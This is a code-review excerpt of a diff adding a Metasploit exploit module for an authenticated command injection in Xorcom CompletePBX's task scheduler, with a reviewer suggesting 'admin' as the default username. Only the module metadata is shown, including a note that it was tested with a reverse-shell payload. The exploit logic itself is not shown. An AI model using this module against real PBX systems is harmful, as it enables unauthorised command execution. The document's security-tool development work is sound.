modules/exploits/linux/http/xorcom_completepbx_scheduler.rb

```diff
@@ -0,0 +1,245 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Xorcom CompletePBX Authenticated Command Injection via Task Scheduler',
+        'Description' => %q{
+          This module exploits an authenticated command injection vulnerability in Xorcom CompletePBX
+          versions <= 5.2.35. The issue resides in the task scheduler functionality, where user-controlled
+          input is improperly sanitized, allowing arbitrary command execution with web server privileges.
+
+          Only the superadmin user (admin) has the necessary permissions to trigger this exploit.
+          Even when creating a new user with maximum privileges, the vulnerability does not work.
+        },
+        'Author' => [
+          'Valentin Lobstein' # Research and module development
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-30004'],
+          ['URL', 'https://www.xorcom.com/products/completepbx/'],
+          ['URL', 'https://chocapikk.com/posts/2025/completepbx/']
+        ],
+        'Privileged' => false,
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Unix/Linux Command Shell',
+            {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2025-03-02',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('USERNAME', [true, 'Valid CompletePBX username']),
```

Comment:
If the exploit won't work with any other username it seems reasonable to set it as the default here. 
```suggestion
      OptString.new('USERNAME', [true, 'Valid CompletePBX username', 'admin']),
```